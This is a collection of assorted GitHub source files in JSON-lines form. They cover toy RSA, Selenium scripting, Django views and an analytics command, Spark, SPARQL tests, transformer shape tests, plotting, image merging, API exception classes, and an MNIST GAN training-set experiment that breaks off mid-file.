+{"seq_id":"20117858242","text":"# import 
def en_crypt(e, n):\n\tprint(\"Enter the message to encrypt\")\n\tc = input()\n\td = []\n\tfor i in c:\n\t\td.append(ord(i))\n\tv = 0\n\tcrypt_d = []\n\twhile v < len(d):\n\t\tcrypt_d.append(pow(d[int(v)], e)%n)\n\t\tv = v + 1\n\tprint(crypt_d)\n\td = []\n\ndef de_crypt(d, n):\n\tprint(\"Enter the message to decrypt (separate the numbers with commas)\")\n\tcc = input().split(\",\")\n\tcc = list(map(int, cc))\n\tv2 = 0\n\td2 = []\n\twhile v2 < len(cc):\n\t\td2.append(pow(cc[int(v2)], d)%n)\n\t\tv2 = v2 + 1\n\t#print(d2)\n\n\tj = []\n\tfor i in d2:\n\t\tj.append(chr(i))\n\tj = ''.join(j)\n\tprint(j)\n\tj = []\n","repo_name":"ebdm13/RSA-algorythme-module","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20117858242","text":"# import Selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\n# Webdriver Configuration with chrome driver\ndriver = webdriver.Chrome(r\"D:\\selenium\\drivers\\chromedriver.exe\")\n\n\n# Load Web APP/URL\ndriver.set_page_load_timeout(50)\ndriver.get(r\"https://thetestingworld.com/testings/\")\n\n# Maximize browser window\ndriver.maximize_window()\n\ndriver.find_element_by_name('fld_username').send_keys(\"ABCD\")\naction = ActionChains(driver)\naction.send_keys(Keys.CONTROL).send_keys('a').perform()\ntime.sleep(5)\n\ntime.sleep(5)\n\naction.send_keys(Keys.ESCAPE).perform()\ntime.sleep(5)\naction.context_click().perform() # perform() is required or the right-click never runs\ntime.sleep(5)\naction.click(driver.find_element_by_id(\"tab2\")).perform()\ntime.sleep(10)\n\ndriver.close()","repo_name":"salvieknath18/python_work","sub_path":"selenium/second_script.py","file_name":"second_script.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12872329692","text":"import os\n\nfrom setuptools import setup, find_packages\n\n__ROOT_DIR__ = os.path.abspath(os.path.dirname(__file__))\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\n\ndef readme():\n    with open(os.path.join(__ROOT_DIR__, 'README.md')) as f:\n        return f.read()\n\n\ndef get_info():\n    info = {}\n    with open(os.path.join(__ROOT_DIR__, 'django_pyctx', '__version__.py'), 'r') as f:\n        exec(f.read(), info)\n    return info\n\n\npackage_info = get_info()\n\nsetup(name=package_info['__title__'],\n      version=package_info['__version__'],\n      description=package_info['__description__'],\n      long_description=readme(),\n      long_description_content_type='text/markdown',\n      classifiers=[\n          'Environment :: Web Environment',\n          'Framework :: Django',\n          'Framework :: Django :: 2.0',\n          'Intended Audience :: Developers',\n          'License :: OSI Approved :: MIT License',\n          'Operating System :: OS Independent',\n          'Programming Language :: Python :: 3.7',\n      ],\n      keywords='pyctx django django-pyctx django-req-ctx context',\n      url=package_info['__url__'],\n      author=package_info['__author__'],\n      author_email=package_info['__author_email__'],\n      license=package_info['__license__'],\n      packages=find_packages(),\n      install_requires=[\n          'pyctx',\n          'django',\n      ],\n      zip_safe=False,\n      )\n","repo_name":"molcay/django-pyctx","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34745400444","text":"import os\n'''\nRecursively traverse a directory tree.\n'''\ndef getAllFires(path,sp):\n    fileList = os.listdir(path)\n    sp+=\" \"\n    for fileName in fileList:\n        fileAbsPath = os.path.join(path,fileName)\n        if os.path.isdir(fileAbsPath):\n            print(sp + \"Directory: \" + fileName)\n            getAllFires(fileAbsPath,sp)\n        else:\n            print(sp + \"Regular file: \" + fileName)\n# getAllFires(\"/Users/ywh/CODESRC\",\" \")\n'''\nDepth-first traversal\n'''\n
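# Note: the explicit stack below replaces the recursive call stack, so very deep\n# directory trees cannot hit Python's recursion limit the way the recursive\n# getAllFires() above could.\n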
fileName)\n\ngetAllPathDeep(\"/Users/ywh/CODESRC\")","repo_name":"Dylan0917/PYTHONLEARNING","sub_path":"com/p1/递归/f1.py","file_name":"f1.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73438366312","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\n\ndef safe_str(obj):\n    try:\n        s2 = str(obj)\n    except:\n        s2 = obj.encode('utf-8').strip()\n    return s2\n\nconf = SparkConf().setAppName(\"CALCULATE NB RATINGS - Python Spark\")\nsc=SparkContext(conf=conf)\ndataRatings =sc.textFile(\"/user/student/MiniProject/ratings.dat\")\ndataRatingSplitted = dataRatings.map(lambda line: line.split(\"::\"))\nrc = dataRatingSplitted.map(lambda line: (line[2],1))\nrc_reduce = rc.reduceByKey(lambda a,b: a+b)\ncsvrc_reduce=rc_reduce.map(lambda list: ','.join(safe_str(elt) for elt in list))\n# Store the output to HDFS\ncsvrc_reduce.saveAsTextFile(\"hdfs:///user/student/output-RalingsVaue/\")\nsc.stop()\n","repo_name":"lhamiche/HAMICHE_Lotfi_DJELLALI_Ferroudja_Hadoop_Projet","sub_path":"SCRIPTS/PySpark_app.py","file_name":"PySpark_app.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14897146589","text":"from brainiak.utils.sparql import QUERY_VALUE_EXISTS, is_result_true\nfrom tests.sparql import QueryTestCase\n\n\nclass ValidateUniquenessTestCase(QueryTestCase):\n\n    graph_uri = \"http://example_alternative.onto/\"\n    fixtures_by_graph = {\n        graph_uri: [\"tests/sample/animalia.n3\"]\n    }\n    maxDiff = None\n\n    def test_query(self):\n        query_params = {\n            \"graph_uri\": self.graph_uri,\n            \"class_uri\": \"http://example.onto/City\",\n            \"instance_uri\": \"http://example.onto/York\",\n            \"predicate_uri\": \"http://example.onto/nickname\",\n            \"object_value\": '\"City of York\"'\n        }\n        query = QUERY_VALUE_EXISTS % query_params\n        query_result = self.query(query)\n        self.assertTrue(is_result_true(query_result))\n\n    def test_query_answer_false(self):\n        query_params = {\n            \"graph_uri\": self.graph_uri,\n            \"class_uri\": \"http://example.onto/City\",\n            \"instance_uri\": \"http://example.onto/York\",\n            \"predicate_uri\": \"http://example.onto/nickname\",\n            \"object_value\": '\"Unexistent value\"'\n        }\n        query = QUERY_VALUE_EXISTS % query_params\n        query_result = self.query(query)\n        self.assertFalse(is_result_true(query_result))\n","repo_name":"bmentges/brainiak_api","sub_path":"tests/integration/test_utils_sparql.py","file_name":"test_utils_sparql.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"11414497741","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User, Group\nfrom app.users.models import UserProfile, Countries, Region\nfrom app.market.models import MarketItem\nfrom django.core.exceptions import ObjectDoesNotExist\nimport logging\nimport csv\n\nlogger = logging.getLogger('notifications')\n\n\nclass Command(BaseCommand):\n    args = ''\n    help = 'User analytics 0620'\n\n    def handle(self, *args, **options):\n        user_list = []\n        all_users = User.objects.all()\n\n        middle_east_region = Region.objects.get(name='Middle East')\n        count_all = Countries.objects.all().count()\n        count_middle_east = Countries.objects.filter(region=middle_east_region).count()\n\n        journalist_group = Group.objects.get(name='Journalists')\n        lawyer_group = Group.objects.get(name='Lawyers')\n        
provider_group = Group.objects.get(name='Provider')\n\n for u in all_users:\n try:\n profile = UserProfile.objects.get(user=u)\n except ObjectDoesNotExist:\n profile = None\n if not profile:\n continue\n\n u_countries = profile.countries.all()\n u_countries_name = [c.countries for c in u_countries]\n if 'Iran' in u_countries_name:\n has_iran = True\n else:\n has_iran = False\n\n if u_countries.count() == count_all:\n has_all_countries = True\n else:\n has_all_countries = False\n\n if u_countries.filter(region=middle_east_region).count() == count_middle_east:\n has_all_middle_east = True\n else:\n has_all_middle_east = False\n\n has_request = MarketItem.objects.filter(owner=u, item_type='request').count() > 0\n has_offer = MarketItem.objects.filter(owner=u, item_type='offer').count() > 0\n\n if journalist_group in u.groups.all():\n in_journalist_group = True\n else:\n in_journalist_group = False\n\n if lawyer_group in u.groups.all():\n in_lawyer_group = True\n else:\n in_lawyer_group = False\n\n if provider_group in u.groups.all():\n in_provider_group = True\n else:\n in_provider_group = False\n\n u_skills = profile.skills.all()\n u_skills_list = \" \".join([s.skills for s in u_skills])\n\n user = {\n 'id': u.id,\n 'email': u.email,\n 'username': u.username,\n 'first_name': u.first_name,\n 'last_name': u.last_name,\n 'has_iran': has_iran,\n 'has_all_middle_east': has_all_middle_east,\n 'has_all_countries': has_all_countries,\n 'has_request': has_request,\n 'has_offer': has_offer,\n 'in_journalist_group': in_journalist_group,\n 'in_lawyer_group': in_lawyer_group,\n 'in_provider_group': in_provider_group,\n 'skills_list': u_skills_list\n }\n\n user_list.append(user)\n\n with open('user_list.csv', 'wb') as write_file:\n w = csv.writer(write_file)\n w.writerow(['ID', 'EMAIL', 'USERNAME', 'IRAN SELECTED', 'MIDDLE EAST SELECTED', 'ALL COUNTRIES SELECTED',\n 'HAS POSTED OFFER', 'HAS POSTED REQUEST', 'MEMBER OF PROVIDERS', 'MEMBER OF LAWYERS',\n 'MEMBER OF JOURNALIST GROUP', 'SKILLS'])\n for u in user_list:\n row = [u['id'], unicode(u['email']).encode('utf-8'), unicode(u['username']).encode('utf-8'),\n u['has_iran'], u['has_all_middle_east'], u['has_all_countries'], u['has_offer'],\n u['has_request'], u['in_provider_group'], u['in_lawyer_group'], u['in_journalist_group'],\n u['skills_list']]\n w.writerow(row)\n","repo_name":"ahguerilla/movements","sub_path":"app/app/management/commands/analytics_0626.py","file_name":"analytics_0626.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31055277274","text":"import tensorflow as tf\nimport numpy as np\nfrom jag.models.transformer import TransformerEncoder\n\n\ndef test_transormer_shape():\n '''Call the transformer shape test n times to ensure stochasticity\n in parameter check.'''\n\n n = 10\n for _ in range(n):\n eval_transformer_shape()\n\n\ndef eval_transformer_shape(params=None):\n '''Basic test to make sure tensorflow is properly installed'''\n\n if not params:\n params = {\n 'n_layers': 3,\n 'd_inner': 50,\n 'n_head': 5,\n 'd_k': 15,\n 'd_v': 15,\n 'embedding_dropout': 0.1,\n 'attention_dropout': 0.1,\n 'residual_dropout': 0.1,\n 'embedding_layer_norm': False,\n 'layer_norm_epsilon': 1e-5,\n 'neg_inf': float(-1e9),\n 'trainable_pos_embedding': True,\n 'use_one_embedding_dropout': True,\n 'use_gelu': False,\n 'accurate_gelu': False,\n 'task_dropout': 0.1,\n }\n\n vocab_size = np.random.randint(20, 50)\n max_len = np.random.randint(10, 25)\n 
num_segments = 2\n d_model = np.random.randint(5, 20)\n d_out = d_model\n\n use_attn_mask = True if np.random.randint(0, 2) == 1 else False\n use_pad_mask = True if np.random.randint(0, 2) == 1 else False\n\n use_pooler = True if np.random.randint(0, 2) == 1 else False\n use_masked_lm = True if np.random.randint(0, 2) == 1 else False\n use_next_sp = True if np.random.randint(0, 2) == 1 else False\n\n do_seq_class_task = True if np.random.randint(0, 2) == 1 else False\n do_tok_class_task = True if np.random.randint(0, 2) == 1 else False\n do_qa_task = True if np.random.randint(0, 2) == 1 else False\n do_mult_choice_task = True if np.random.randint(0, 2) == 1 else False\n\n if do_seq_class_task or do_mult_choice_task:\n use_pooler = True\n\n # batch_size must be a multiple of this params\n task_num_choices = np.random.randint(2, 4)\n seq_class_num_labels = np.random.randint(2, 5)\n tok_class_num_labels = np.random.randint(2, 6)\n\n params['vocab_size'] = vocab_size\n params['max_len'] = max_len\n params['num_segments'] = num_segments\n params['d_model'] = d_model\n params['d_out'] = d_out\n\n params['use_attn_mask'] = use_attn_mask\n params['use_pad_mask'] = use_pad_mask\n\n params['use_pooler'] = use_pooler\n params['use_masked_lm'] = use_masked_lm\n params['use_next_sp'] = use_next_sp\n\n params['do_seq_class_task'] = do_seq_class_task\n params['do_tok_class_task'] = do_tok_class_task\n params['do_qa_task'] = do_qa_task\n params['do_mult_choice_task'] = do_mult_choice_task\n\n params['task_num_choices'] = task_num_choices\n params['seq_class_num_labels'] = seq_class_num_labels\n params['tok_class_num_labels'] = tok_class_num_labels\n\n # tf.enable_eager_execution()\n model = TransformerEncoder(**params)\n\n cur_len = np.random.randint(3, max_len + 1)\n if do_mult_choice_task:\n batch_size = np.random.randint(2, 4) * task_num_choices\n else:\n batch_size = np.random.randint(2, 10)\n\n expected_inputs = []\n expected_outputs_shape = []\n\n # tokens, segment_ids, pos_ids, attn_mask, pad_mask\n\n token_data = np.random.randint(0, vocab_size, size=(batch_size, cur_len))\n token = tf.constant(token_data, dtype=tf.int32)\n expected_inputs.append(token)\n if num_segments > 0:\n segment_ids = tf.constant(\n np.random.randint(0, num_segments, size=(batch_size, cur_len)),\n dtype=tf.int32\n )\n expected_inputs.append(segment_ids)\n\n pos_ids = tf.constant(\n np.array(\n [list(range(cur_len)) for _ in range(batch_size)],\n dtype=np.int32\n ),\n dtype=tf.int32\n )\n expected_inputs.append(pos_ids)\n\n if use_attn_mask:\n attn_mask = np.equal(token_data, 0, dtype=np.float32)\n attn_mask = attn_mask.astype(np.float32)\n attn_mask = attn_mask.reshape((batch_size, 1, cur_len))\n attn_mask = np.ones((batch_size, cur_len, 1),\n dtype=np.float32) * attn_mask\n attn_mask = attn_mask.reshape((batch_size, 1, cur_len, cur_len))\n attn_mask = tf.constant(attn_mask)\n expected_inputs.append(attn_mask)\n\n if use_pad_mask:\n pad_mask = np.equal(token_data, 0, dtype=np.float32)\n pad_mask = pad_mask.astype(np.float32)\n pad_mask = pad_mask.reshape((batch_size, cur_len, 1))\n pad_mask = tf.constant(pad_mask)\n expected_inputs.append(pad_mask)\n\n expected_outputs_shape.append([batch_size, cur_len, d_out])\n if model.use_pooler:\n expected_outputs_shape.append([batch_size, d_out])\n if model.use_masked_lm:\n expected_outputs_shape.append([batch_size, cur_len, vocab_size])\n if model.use_next_sp:\n expected_outputs_shape.append([batch_size, 2])\n\n if model.do_seq_class_task:\n expected_outputs_shape.append([batch_size, 
seq_class_num_labels])\n if model.do_mult_choice_task:\n expected_outputs_shape.append(\n [batch_size // task_num_choices, task_num_choices])\n if model.do_tok_class_task:\n expected_outputs_shape.append(\n [batch_size, cur_len, tok_class_num_labels])\n if model.do_qa_task:\n expected_outputs_shape.append([batch_size, cur_len])\n expected_outputs_shape.append([batch_size, cur_len])\n\n if not tf.executing_eagerly():\n graph = model(expected_inputs)\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n outputs = sess.run(graph)\n else:\n outputs = model(expected_inputs)\n\n if isinstance(outputs, (list, tuple)):\n assert len(expected_outputs_shape) == len(outputs), \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {[v.shape for v in outputs]}')\n for i, v in enumerate(outputs):\n assert list(v.shape) == expected_outputs_shape[i], \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {[v.shape for v in outputs]}'\n f'Index: {i}')\n\n else:\n assert len(expected_outputs_shape) == 1, \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {outputs.shape}')\n\n assert list(outputs.shape) == expected_outputs_shape[0], \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {outputs.shape}')\n","repo_name":"jerpint/jag","sub_path":"unit_tests/test_transformer.py","file_name":"test_transformer.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34309187361","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef draw(x,y,name,x_name,y_name):\n plt.clf()\n x_idx = np.arange(len(x))\n plt.bar(x_idx, y)\n plt.xticks(x_idx,x)\n plt.xlabel(x_name)\n plt.ylabel(y_name)\n # plt.ylim([y_min,y_max])\n plt.title(name)\n plt.savefig(name)\n\nif __name__==\"__main__\":\n with open(\"gtx1080\",\"r\", newline=\"\") as f:\n data = f.read().splitlines()\n modelname = list()\n h2d = list()\n d2d = list()\n d2h = list()\n total = list()\n for i in data:\n i = i.split(\" \")\n modelname.append(i[0])\n total.append(float(i[1]))\n h2d.append(float(i[7]))\n d2d.append(float(i[8]))\n d2h.append(float(i[9]))\n draw(modelname, total, \"GTX1080 total inference time\", \"model name\", \"time(ms)\")\n draw(modelname, h2d, \"GTX1080 total HtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2d, \"GTX1080 total DtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2h, \"GTX1080 total DtoH time\", \"model_name\", \"time(ms)\")\n \n with open(\"rtx2060\", \"r\", newline=\"\") as f:\n data = f.read().splitlines()\n modelname = list()\n h2d = list()\n d2d = list()\n d2h = list()\n total = list()\n for i in data:\n i = i.split(\" \")\n modelname.append(i[0])\n total.append(float(i[1]))\n h2d.append(float(i[6]))\n d2d.append(float(i[7]))\n d2h.append(float(i[8]))\n print(h2d)\n print(d2d)\n print(d2h)\n draw(modelname, total, \"RTX2060 total inference time\", \"model name\", \"time(ms)\")\n draw(modelname, h2d, \"RTX2060 total HtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2d, \"RTX2060 total DtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2h, \"RTX2060 total DtoH time\", \"model_name\", \"time(ms)\")\n","repo_name":"chilin0525/tmp","sub_path":"draw_image.py","file_name":"draw_image.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"39787331918","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.utils import timezone\n\nfrom .forms import PostForm\nfrom .models import Post\n\n\ndef about(request):\n return render(request, 'blog/about.html')\n\n\ndef contact_page(request):\n return render(request, 'blog/contact.html')\n\n\ndef home(request):\n return render(request, 'blog/home.html')\n\n\ndef post_detail(request, slug):\n post = get_object_or_404(Post, slug=slug)\n return render(request, 'blog/post_detail.html', {'post': post})\n\n\n@login_required\ndef post_draft_list(request):\n posts = Post.objects.filter(published_date__isnull=True).order_by('created_date')\n return render(request, 'blog/post_draft_list.html', {'posts': posts})\n\n\n@login_required\ndef post_edit(request, slug):\n post = get_object_or_404(Post, slug=slug)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.publish() if request.user.is_superuser else post.save()\n return redirect('post_detail', slug=post.slug)\n else:\n form = PostForm(instance=post)\n return render(request, 'blog/post_edit.html', {'form': form})\n\n\ndef post_list(request):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n return render(request, 'blog/blog.html', {'posts': posts})\n\n\n@login_required\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.publish() if request.user.is_superuser else post.save()\n return redirect('post_detail', slug=post.slug)\n else:\n form = PostForm()\n return render(request, 'blog/post_edit.html', {'form': form})\n\n\n@login_required\ndef post_publish(request, pk):\n post = get_object_or_404(Post, pk=pk)\n post.publish()\n return redirect('post_detail', pk=pk)\n\n\n@login_required\ndef post_remove(request, pk):\n post = get_object_or_404(Post, pk=pk)\n post.delete()\n return redirect('post_list')\n","repo_name":"bnx05/hello-django","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15149199499","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport copy\r\n\r\n# input = sys.stdin.readline\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~_(??? ? 
?)_~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\nN = int(input())\r\n\r\nsum = 0\r\n\r\nfor _ in range(N):\r\n a, b = map(int, input().split())\r\n sum += a * b\r\n\r\nprint(int(sum * 1.05))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc009/A/4981982.py","file_name":"4981982.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"8834056055","text":"from __future__ import print_function\nimport os,sys\nfrom PIL import Image\n\npath = \"/mnt/home/mengfanr/Arabidopsis_seeds_detect/faster_rcnn_seeds_part_tiles_all_1500/test_image_new_half_half_results\"\nos.chdir(path)\nfor root, dirs, files in os.walk(path):\n for f in files:\n if f.startswith(sys.argv[1]+'_0_0'):\n f1=f\n elif f.startswith(sys.argv[1]+'_1_0'):\n f2=f\n elif f.startswith(sys.argv[1]+'_0_1'):\n f3=f\n elif f.startswith(sys.argv[1]+'_1_1'):\n f4=f\nc1=f1.split(\".\")[-2].split(\"_\")[1]\nc2=f2.split(\".\")[-2].split(\"_\")[1]\nc3=f3.split(\".\")[-2].split(\"_\")[1]\nc4=f4.split(\".\")[-2].split(\"_\")[1]\ncount = int(c1)+int(c2)+int(c3)+int(c4)\nfiles = [f1,f2,f3,f4]\n\nresult = Image.new(\"RGB\", (2900, 2900))\n\nfor index, file in enumerate(files):\n path = os.path.expanduser(file)\n img = Image.open(path)\n img.thumbnail((1450, 1450), Image.ANTIALIAS)\n x = index // 2 * 1450\n y = index % 2 * 1450\n w, h = img.size\n result.paste(img, (x, y, x + w, y + h))\n\nresult.save(os.path.expanduser(sys.argv[1]+\"_merge_\"+str(count)+\".jpg\"))\n","repo_name":"ShiuLab/Manuscript_Code","sub_path":"2022_Arabidopsis_seed_and_fruit_count/Scripts_for_Faster_R-CNN/08_02_merge_images.py","file_name":"08_02_merge_images.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"43613655073","text":"\"\"\"Provide exception classes for the stare package.\"\"\"\n\nimport sys\nimport json\n\ntry:\n from json.decoder import JSONDecodeError\nexcept ImportError:\n JSONDecodeError = ValueError\n\nif sys.version_info[0] == 2:\n from urlparse import urlparse\nelse:\n from urllib.parse import urlparse\n\n\nclass GlanceDBException(Exception):\n \"\"\"Base exception class for exceptions that occur within this package.\"\"\"\n\n\nclass InvalidInvocation(GlanceDBException):\n \"\"\"Indicate that the code to execute cannot be completed.\"\"\"\n\n\nclass ResponseException(GlanceDBException):\n \"\"\"Indicate that there was an error with the completed HTTP request.\"\"\"\n\n def __init__(self, response, additional_message=None):\n \"\"\"Initialize a ResponseException instance.\n :param response: A requests.response instance.\n \"\"\"\n self.response = response\n message = 'received {} HTTP response'.format(response.status_code)\n try:\n if additional_message is None:\n additional_message = json.dumps(response.json(), indent=2)\n\n except JSONDecodeError:\n additional_message = response.text.strip()\n\n if additional_message:\n message = '{}. 
The following details may help:\\n{}'.format(\n                message, additional_message\n            )\n        super(ResponseException, self).__init__(message)\n\n\nclass ExchangeFailure(ResponseException):\n    \"\"\"Indicate that exchanging the access token failed.\"\"\"\n\n\nclass BadJSON(ResponseException):\n    \"\"\"Indicate the response did not contain valid JSON.\"\"\"\n\n\nclass BadRequest(ResponseException):\n    \"\"\"Indicate invalid parameters for the request.\"\"\"\n\n\nclass Conflict(ResponseException):\n    \"\"\"Indicate a conflicting change in the target resource.\"\"\"\n\n\nclass Forbidden(ResponseException):\n    \"\"\"Indicate the authentication is not permitted for the request.\"\"\"\n\n    def __init__(self, response):\n        additional_message = None\n        try:\n            additional_message = (\n                response.json()\n                .get('uuAppErrorMap', {})\n                .get('uu-app-workspace/authorization/userIsNotAuthorized', {})\n                .get('message', None)\n            )\n        except JSONDecodeError:\n            pass\n        super(Forbidden, self).__init__(response, additional_message)\n\n\nclass NotFound(ResponseException):\n    \"\"\"Indicate that the requested URL was not found.\"\"\"\n\n\nclass Redirect(ResponseException):\n    \"\"\"Indicate the request resulted in a redirect.\n\n    This class adds the attribute ``path``, which is the path to which the\n    response redirects.\n\n    \"\"\"\n\n    def __init__(self, response):\n        \"\"\"Initialize a Redirect exception instance.\n\n        :param response: A requests.response instance containing a location\n        header.\n\n        \"\"\"\n        path = urlparse(response.headers['location']).path\n        self.path = path[:-5] if path.endswith('.json') else path\n        self.response = response\n        GlanceDBException.__init__(self, 'Redirect to {}'.format(self.path))\n\n\nclass ServerError(ResponseException):\n    \"\"\"Indicate issues on the server end preventing request fulfillment.\"\"\"\n\n\nclass SpecialError(ResponseException):\n    \"\"\"Indicate syntax or spam-prevention issues.\"\"\"\n\n    def __init__(self, response):\n        \"\"\"Initialize a SpecialError exception instance.\n\n        :param response: A requests.response instance containing a message\n        and a list of special errors.\n\n        \"\"\"\n        self.response = response\n\n        resp_dict = self.response.json() # assumes valid JSON\n        self.message = resp_dict.get('message', '')\n        self.reason = resp_dict.get('reason', '')\n        self.special_errors = resp_dict.get('special_errors', [])\n        GlanceDBException.__init__(self, 'Special error {!r}'.format(self.message))\n\n\nclass TooLarge(ResponseException):\n    \"\"\"Indicate that the request data exceeds the allowed limit.\"\"\"\n\n\nclass UnavailableForLegalReasons(ResponseException):\n    \"\"\"Indicate that the requested URL is unavailable due to legal reasons.\"\"\"\n\n\nclass UnhandledResponse(ResponseException):\n    \"\"\"Indicate a response status code we have not dealt with yet.\"\"\"\n","repo_name":"kratsg/stare","sub_path":"src/stare/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"31373617254","text":"from tf_version_mnist.discriminator import *\nfrom tf_version_mnist.generator import *\nimport tensorflow as tf\nimport sklearn.svm as svm\nimport matplotlib.pyplot as plt\n\n\nn_trials = 1000 # number of trials\nn_t = 100 # total number of training points\nz_dim = 100 # generator input dimension\nbatch_size = 64 # size of input batch\ny_dim = 2 # number of classes\nchannel = 1 # number of channels, MNIST is grayscale\nim_dim = 28 # dimension of 1 side of image\ngen_share = 
0.4 # % of training set to be generated\nnoise_norm = 13. # norm of a random noise\ndata_shift = 0\nvalidation_crit_val = 3.69\nskip_validation = True\nlabels_to_use = [5, 6]\nmodel_to_load = '01-17_15_41_0.75'\nmodel_path = '/home/iindyk/PycharmProjects/my_GAN/saved_models_my_GAN/' + model_to_load + '/model.ckpt'\n\n\n(x_train_all, y_train_all), (x_test_all, y_test_all) = tf.keras.datasets.mnist.load_data()\nx_train_all, x_test_all = x_train_all/255., x_test_all/255.\nx_train_all, x_test_all = x_train_all-np.mean(x_train_all), x_test_all-np.mean(x_test_all)\n\n# take only images of digits from labels_to_use\nx_train = []\ny_train = []\n\nn_orig = int(n_t*(1-gen_share))\n\nfor i in range(len(y_train_all)):\n if y_train_all[i] == labels_to_use[0]:\n x_train.append(x_train_all[i])\n y_train.append([1., 0.])\n elif y_train_all[i] == labels_to_use[1]:\n x_train.append(x_train_all[i])\n y_train.append([0., 1.])\n\nx_test = []\ny_test = []\nfor i in range(len(y_test_all)):\n if y_test_all[i] == labels_to_use[0]:\n x_test.append(x_test_all[i])\n y_test.append(1)\n elif y_test_all[i] == labels_to_use[1]:\n x_test.append(x_test_all[i])\n y_test.append(-1)\n\nx_train = np.array(x_train, dtype=np.float32)\ny_train = np.array(y_train, dtype=np.float32)\nx_test = np.reshape(np.array(x_test, dtype=np.float32), newshape=(-1, 784))\ny_test = np.array(y_test, dtype=np.float32)\n\n# placeholder for input images to the discriminator\nx_placeholder = tf.placeholder(\"float\", shape=[batch_size, im_dim, im_dim, channel])\ny_placeholder = tf.placeholder(\"float\", shape=[batch_size, y_dim])\n# placeholder for input noise vectors to the generator\nz_placeholder = tf.placeholder(tf.float32, [None, z_dim])\n\ndiscriminator = Discriminator1(batch_size, y_dim)\ngenerator = Generator1(None, batch_size, y_dim, im_dim, channel,\n initial_x_train=[], initial_y_train=[], x_test=[], y_test=[])\n\n# d_x will hold discriminator prediction probabilities\n_, d_x = discriminator.act(x_placeholder, y_placeholder)\n# g_z holds the generated images\ng_z = generator.act(z_placeholder, y_placeholder)\n\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n # restore model from file\n saver.restore(sess, model_path)\n print(\"Model restored.\")\n\n errs = []\n false_neg = []\n\n # false positive rate calculation\n false_pos = 0\n _dt_tmp = np.append(np.reshape(x_train[data_shift:n_orig + data_shift], newshape=(-1, 784)),\n np.zeros((batch_size - n_orig, 784)), axis=0)\n _lb_tmp = np.append(y_train[data_shift:n_orig + data_shift], [[0., 1.]] * (batch_size - n_orig), axis=0)\n val = sess.run(d_x, feed_dict={\n x_placeholder: np.reshape(_dt_tmp, newshape=[batch_size, im_dim, im_dim, channel]),\n y_placeholder: _lb_tmp})\n for k in range(batch_size):\n if val[k, 0] <= validation_crit_val and k < n_orig:\n false_pos += 1\n\n for trial in range(n_trials):\n\n indices = np.random.randint(low=n_orig+data_shift, high=len(y_train), size=n_t-n_orig)\n additional_y_train = y_train[indices, :]\n noise = np.random.uniform(low=-1., high=1., size=(n_t-n_orig, 784))\n # normalize noise\n noise = np.array([(noise[i]/np.linalg.norm(noise[i]))*noise_norm for i in range(len(noise))])\n additional_x_train = np.reshape(x_train[indices, 